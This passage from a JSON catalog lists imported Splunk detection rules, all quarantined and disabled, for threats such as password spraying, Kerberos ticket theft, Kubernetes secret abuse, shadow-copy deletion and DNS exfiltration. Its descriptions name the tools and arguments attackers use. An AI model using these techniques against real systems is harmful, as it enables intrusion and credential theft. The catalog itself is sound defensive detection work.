campaigns. It leverages GSuite Drive logs to identify documents with titles that include keywords like \"dhl,\" \"ups,\" \"invoice,\" and \"shipment.\" This activity is significant because such filenames are often used to lure users into opening malicious documents or clicking harmful links. 
If confirmed malicious, this activity could lead to unauthorized access, data theft, or further compromise of the user's system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/gsuite-suspicious-shared-file-name.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "07eed200-03f5-11ec-98fb-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/gsuite_suspicious_shared_file_name.yml" } }, { "id": "splunk-security-content-08058866-7987-486f-b042-275715ef6e9d", "type": "detection", "name": "Windows Impair Defense Override SmartScreen Prompt", "description": "The following analytic detects modifications to the Windows registry that override the Windows Defender SmartScreen prompt. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to the \"PreventSmartScreenPromptOverride\" registry setting. This activity is significant because it indicates an attempt to disable the prevention of user overrides for SmartScreen prompts, potentially allowing users to bypass security warnings. 
If confirmed malicious, this could lead to users inadvertently executing or accessing harmful content, increasing the risk of security incidents or system compromises.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-override-smartscreen-prompt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "08058866-7987-486f-b042-275715ef6e9d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_override_smartscreen_prompt.yml" } }, { "id": "splunk-security-content-081c485d-ac8d-4bee-ad4c-525772fead4d", "type": "detection", "name": "Windows Office Product Spawned Control", "description": "The following analytic identifies instances where `control.exe` is spawned by a Microsoft Office product. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and parent process relationships. This activity is significant because it can indicate exploitation attempts related to CVE-2021-40444, where `control.exe` is used to execute malicious .cpl or .inf files. 
If confirmed malicious, this behavior could allow an attacker to execute arbitrary code, potentially leading to system compromise, data exfiltration, or further lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-office-product-spawned-control.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "081c485d-ac8d-4bee-ad4c-525772fead4d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_office_product_spawned_control.yml" } }, { "id": "splunk-security-content-083708d4-d763-4ba2-87ac-105b526de81a", "type": "detection", "name": "Windows Audit Policy Excluded Category via Auditpol", "description": "The following analytic identifies the execution of `auditpol.exe` with the \"/set\" and \"/exclude\" command-line arguments, which indicates that a per-user audit policy is being configured to suppress auditing for that user regardless of the system audit policy. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity can be significant as it indicates potential defense evasion by adversaries or Red Teams, aiming to exclude specific users' events from log data. 
If confirmed malicious, this behavior could allow attackers to bypass defenses, and plan further attacks, potentially leading to full machine compromise or lateral movement.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-audit-policy-excluded-category-via-auditpol.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "083708d4-d763-4ba2-87ac-105b526de81a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_audit_policy_excluded_category_via_auditpol.yml" } }, { "id": "splunk-security-content-084275ba-61b8-11ec-8d64-acde48001122", "type": "detection", "name": "Linux Service Restarted", "description": "The following analytic detects the restarting or re-enabling of services on Linux systems using the `systemctl` or `service` commands. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and command-line execution logs. This activity is significant as adversaries may use it to maintain persistence or execute unauthorized actions. If confirmed malicious, this behavior could lead to repeated execution of malicious payloads, unauthorized access, or data destruction. 
Security analysts should investigate these events to mitigate risks and prevent further compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-service-restarted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "084275ba-61b8-11ec-8d64-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_service_restarted.yml" } }, { "id": "splunk-security-content-086ab581-8877-42b3-9aee-4a7ecb0923af", "type": "detection", "name": "Detect Password Spray Attempts", "description": "This analytic employs the 3-sigma approach to detect an unusual volume of failed authentication attempts from a single source. A password spray attack is a type of brute force attack where an attacker tries a few common passwords across many different accounts to avoid detection and account lockouts. 
By utilizing the Authentication Data Model, this detection is effective for all CIM-mapped authentication events, providing comprehensive coverage and enhancing security against these attacks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-password-spray-attempts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "086ab581-8877-42b3-9aee-4a7ecb0923af", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/detect_password_spray_attempts.yml" } }, { "id": "splunk-security-content-089c862f-5f83-49b5-b1c8-7e4ff66560c7", "type": "detection", "name": "Domain Group Discovery with Adsisearcher", "description": "The following analytic detects the use of the `[Adsisearcher]` type accelerator in PowerShell to query Active Directory for domain groups. It leverages PowerShell Script Block Logging (EventCode=4104) to identify specific script blocks containing `[adsisearcher]` and group-related queries. This activity is significant as it may indicate an attempt by adversaries or Red Teams to enumerate domain groups for situational awareness and Active Directory discovery. 
If confirmed malicious, this behavior could lead to further reconnaissance, privilege escalation, or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/domain-group-discovery-with-adsisearcher.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "089c862f-5f83-49b5-b1c8-7e4ff66560c7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/domain_group_discovery_with_adsisearcher.yml" } }, { "id": "splunk-security-content-08c41040-624c-11ec-a71f-acde48001122", "type": "detection", "name": "Linux Visudo Utility Execution", "description": "The following analytic detects the execution of the 'visudo' utility to modify the /etc/sudoers file on a Linux system. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs. This activity is significant because unauthorized changes to the /etc/sudoers file can grant elevated privileges to users, potentially allowing adversaries to execute commands as root. 
If confirmed malicious, this could lead to full system compromise, privilege escalation, and persistent unauthorized access, severely impacting the security posture of the affected host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-visudo-utility-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "08c41040-624c-11ec-a71f-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_visudo_utility_execution.yml" } }, { "id": "splunk-security-content-08cb291e-ea77-48e8-a95a-0799319bf056", "type": "detection", "name": "Windows AD DSRM Account Changes", "description": "The following analytic identifies changes to the Directory Services Restore Mode (DSRM) account behavior via registry modifications. It detects alterations in the registry path \"*\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\DSRMAdminLogonBehavior\" with specific values indicating potential misuse. This activity is significant because the DSRM account, if misconfigured, can be exploited to persist within a domain, similar to a local administrator account. 
If confirmed malicious, an attacker could gain persistent administrative access to a Domain Controller, leading to potential domain-wide compromise and unauthorized access to sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-dsrm-account-changes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "08cb291e-ea77-48e8-a95a-0799319bf056", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_dsrm_account_changes.yml" } }, { "id": "splunk-security-content-08d67349-0808-4f55-b431-1037269fa517", "type": "detection", "name": "Windows PowerShell Process Implementing Manual Base64 Decoder", "description": "The following analytic identifies Windows PowerShell processes that implement a manual Base64 decoder.\nThreat actors often use Base64 encoding to obfuscate malicious payloads or commands within PowerShell scripts.\nBy manually decoding Base64 strings, attackers can evade detection mechanisms that look for standard decoding functions like using the \"-enc\" flag or the \"FromBase64String\" function.\nThis detection focuses on PowerShell processes that exhibit characteristics of manual Base64 decoding, such as the presence of specific string manipulation methods and bitwise operations.\nSecurity teams should investigate any instances of such activity, especially if found in conjunction with other suspicious behaviors or on systems that should not be using PowerShell for 
such tasks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027.010", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powershell-process-implementing-manual-base64-decoder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "08d67349-0808-4f55-b431-1037269fa517", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powershell_process_implementing_manual_base64_decoder.yml" } }, { "id": "splunk-security-content-091712ff-b02a-4d43-82ed-34765515d95d", "type": "detection", "name": "GetNetTcpconnection with PowerShell Script Block", "description": "The following analytic detects the execution of the `Get-NetTcpconnection` PowerShell cmdlet using PowerShell Script Block Logging (EventCode=4104). This cmdlet lists network connections on a system, which adversaries may use for situational awareness and Active Directory discovery. Monitoring this activity is crucial as it can indicate reconnaissance efforts by an attacker. 
If confirmed malicious, this behavior could allow an attacker to map the network, identify critical systems, and plan further attacks, potentially leading to data exfiltration or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1049" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/getnettcpconnection-with-powershell-script-block.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "091712ff-b02a-4d43-82ed-34765515d95d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/getnettcpconnection_with_powershell_script_block.yml" } }, { "id": "splunk-security-content-09555511-aca6-484a-b6ab-72cd03d73c34", "type": "detection", "name": "Windows Local Administrator Credential Stuffing", "description": "The following analytic detects attempts to authenticate using the built-in local Administrator account across more than 30 endpoints within a 5-minute window. It leverages Windows Event Logs, specifically events 4625 and 4624, to identify this behavior. This activity is significant as it may indicate an adversary attempting to validate stolen local credentials across multiple hosts, potentially leading to privilege escalation. 
If confirmed malicious, this could allow the attacker to gain widespread access and control over numerous systems within the network, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-local-administrator-credential-stuffing.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "09555511-aca6-484a-b6ab-72cd03d73c34", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_local_administrator_credential_stuffing.yml" } }, { "id": "splunk-security-content-096ab390-05ca-462c-884e-343acd5b9240", "type": "detection", "name": "Kubernetes Abuse of Secret by Unusual User Agent", "description": "The following analytic detects unauthorized access or misuse of Kubernetes Secrets by unusual user agents. It leverages Kubernetes Audit logs to identify anomalies in access patterns by analyzing the source of requests based on user agents. This activity is significant for a SOC because Kubernetes Secrets store sensitive information like passwords, OAuth tokens, and SSH keys, making them critical assets. 
If confirmed malicious, this activity could lead to unauthorized access to sensitive systems or data, potentially resulting in significant security breaches and exfiltration of critical information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-abuse-of-secret-by-unusual-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "096ab390-05ca-462c-884e-343acd5b9240", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_abuse_of_secret_by_unusual_user_agent.yml" } }, { "id": "splunk-security-content-09725404-a44f-4ed3-9efa-8ed5d69e4c53", "type": "detection", "name": "GetDomainGroup with PowerShell Script Block", "description": "The following analytic detects the execution of the `Get-DomainGroup` cmdlet using PowerShell Script Block Logging (EventCode=4104). This cmdlet, part of the PowerView tool, is used to enumerate domain groups within a Windows domain. The detection leverages script block text to identify this specific command. Monitoring this activity is crucial as it may indicate an adversary or Red Team performing reconnaissance to gain situational awareness and map out Active Directory structures. 
If confirmed malicious, this activity could lead to further exploitation, including privilege escalation and lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/getdomaingroup-with-powershell-script-block.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "09725404-a44f-4ed3-9efa-8ed5d69e4c53", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/getdomaingroup_with_powershell_script_block.yml" } }, { "id": "splunk-security-content-097b28b5-7004-4d40-a715-7e390501788b", "type": "detection", "name": "Linux Ruby Privilege Escalation", "description": "The following analytic detects the execution of Ruby commands with elevated privileges on a Linux system. It identifies processes where Ruby is used with the `-e` flag to execute commands via `sudo`, leveraging Endpoint Detection and Response (EDR) telemetry. This activity is significant because it indicates a potential privilege escalation attempt, allowing a user to execute commands as root. 
If confirmed malicious, this could lead to full system compromise, enabling an attacker to gain root access, execute arbitrary commands, and maintain persistent control over the affected system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-ruby-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "097b28b5-7004-4d40-a715-7e390501788b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_ruby_privilege_escalation.yml" } }, { "id": "splunk-security-content-0995fca1-f346-432f-b0bf-a66d14e6b428", "type": "detection", "name": "Windows Increase in User Modification Activity", "description": "This analytic detects an increase in modifications to AD user objects. A large volume of changes to user objects can indicate potential security risks, such as unauthorized access attempts, impairing defences or establishing persistence. 
By monitoring AD logs for unusual modification patterns, this detection helps identify suspicious behavior that could compromise the integrity and security of the AD environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098", "T1562" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-increase-in-user-modification-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0995fca1-f346-432f-b0bf-a66d14e6b428", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_increase_in_user_modification_activity.yml" } }, { "id": "splunk-security-content-09d88404-1e29-46cb-806c-1eedbc85ad5d", "type": "detection", "name": "Windows Steal or Forge Kerberos Tickets Klist", "description": "The following analytic identifies the execution of the Windows OS tool klist.exe, often used by post-exploitation tools like winpeas. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and parent process details. Monitoring klist.exe is significant as it can indicate attempts to list or gather cached Kerberos tickets, which are crucial for lateral movement or privilege escalation. 
If confirmed malicious, this activity could enable attackers to move laterally within the network or escalate privileges, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1558" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-steal-or-forge-kerberos-tickets-klist.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "09d88404-1e29-46cb-806c-1eedbc85ad5d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_steal_or_forge_kerberos_tickets_klist.yml" } }, { "id": "splunk-security-content-09e5c72a-4c0d-11ec-aa29-3e22fbd008af", "type": "detection", "name": "Svchost LOLBAS Execution Process Spawn", "description": "The following analytic detects instances of 'svchost.exe' spawning Living Off The Land Binaries and Scripts (LOLBAS) processes. It leverages Endpoint Detection and Response (EDR) data to monitor child processes of 'svchost.exe' that match known LOLBAS executables. This activity is significant as adversaries often use LOLBAS techniques to execute malicious code stealthily, potentially indicating lateral movement or code execution attempts. 
If confirmed malicious, this behavior could allow attackers to execute arbitrary commands, escalate privileges, or maintain persistence within the environment, posing a significant security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/svchost-lolbas-execution-process-spawn.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "09e5c72a-4c0d-11ec-aa29-3e22fbd008af", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/svchost_lolbas_execution_process_spawn.yml" } }, { "id": "splunk-security-content-0a46537c-be02-11eb-92ca-acde48001122", "type": "detection", "name": "Allow Inbound Traffic By Firewall Rule Registry", "description": "The following analytic detects suspicious modifications to firewall rule registry settings that allow inbound traffic on specific ports with a public profile. It leverages data from the Endpoint.Registry data model, focusing on registry paths and values indicative of such changes. This activity is significant as it may indicate an adversary attempting to grant remote access to a machine by modifying firewall rules. 
If confirmed malicious, this could enable unauthorized remote access, potentially leading to further exploitation, data exfiltration, or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/allow-inbound-traffic-by-firewall-rule-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0a46537c-be02-11eb-92ca-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/allow_inbound_traffic_by_firewall_rule_registry.yml" } }, { "id": "splunk-security-content-0a69fdaa-a2b8-11eb-b16d-acde48001122", "type": "detection", "name": "Excessive Usage of NSLOOKUP App", "description": "The following analytic detects excessive usage of the nslookup application, which may indicate potential DNS exfiltration attempts. It leverages Sysmon EventCode 1 to monitor process executions, specifically focusing on nslookup.exe. The detection identifies outliers by comparing the frequency of nslookup executions against a calculated threshold. This activity is significant as it can reveal attempts by malware or APT groups to exfiltrate data via DNS queries. 
If confirmed malicious, this behavior could allow attackers to stealthily transfer sensitive information out of the network, bypassing traditional data exfiltration defenses.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1048" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/excessive-usage-of-nslookup-app.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0a69fdaa-a2b8-11eb-b16d-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/excessive_usage_of_nslookup_app.yml" } }, { "id": "splunk-security-content-0a8c4b26-a4e2-4ef1-b0d9-62af6d36bdc8", "type": "detection", "name": "Windows WMIC Shadowcopy Delete", "description": "This analytic detects the use of WMIC to delete volume shadow copies, which is a common technique used by ransomware actors to prevent system recovery. Ransomware like Cactus often delete shadow copies before encrypting files to ensure victims cannot recover their data without paying the ransom. 
This behavior is particularly concerning as it indicates potential ransomware activity or malicious actors attempting to prevent system recovery.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-wmic-shadowcopy-delete.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0a8c4b26-a4e2-4ef1-b0d9-62af6d36bdc8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_wmic_shadowcopy_delete.yml" } }, { "id": "splunk-security-content-0ada2f82-b7af-40cc-b1d7-1e5985afcb4e", "type": "detection", "name": "Windows Find Domain Organizational Units with GetDomainOU", "description": "The following analytic detects the execution of the `Get-DomainOU` cmdlet, a part of the PowerView toolkit used for Windows domain enumeration. It leverages PowerShell Script Block Logging (EventCode=4104) to identify this activity. Detecting `Get-DomainOU` usage is significant as adversaries may use it to gather information about organizational units within Active Directory, which can facilitate lateral movement or privilege escalation. 
If confirmed malicious, this activity could allow attackers to map the domain structure, aiding in further exploitation and persistence within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-find-domain-organizational-units-with-getdomainou.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0ada2f82-b7af-40cc-b1d7-1e5985afcb4e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_find_domain_organizational_units_with_getdomainou.yml" } }, { "id": "splunk-security-content-0ae94cdd-021a-4a62-a96d-9cec90b61530", "type": "detection", "name": "M365 Copilot Failed Authentication Patterns", "description": "Detects M365 Copilot users with failed authentication attempts, MFA failures, or multi-location access patterns indicating potential credential attacks or account compromise. The detection aggregates M365 Copilot Graph API authentication events per user, calculating metrics like distinct cities/countries accessed, unique IP addresses and browsers, failed login attempts (status containing \"fail\" or \"error\"), and MFA failures (error code 50074). 
Users are flagged when they access Copilot from multiple cities (cities_count > 1), experience any authentication failures (failed_attempts > 0), or encounter MFA errors (mfa_failures > 0), which are indicators of credential stuffing, brute force attacks, or compromised accounts attempting to bypass multi-factor authentication.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/m365-copilot-failed-authentication-patterns.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0ae94cdd-021a-4a62-a96d-9cec90b61530", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/m365_copilot_failed_authentication_patterns.yml" } }, { "id": "splunk-security-content-0b0c40dc-14a6-11ec-b267-acde48001122", "type": "detection", "name": "MS Scripting Process Loading Ldap Module", "description": "The following analytic detects the execution of MS scripting processes (wscript.exe or cscript.exe) loading LDAP-related modules (Wldap32.dll, adsldp.dll, adsldpc.dll). It leverages Sysmon EventCode 7 to identify these specific DLL loads. This activity is significant as it may indicate an attempt to query LDAP for host information, a behavior observed in FIN7 implants. 
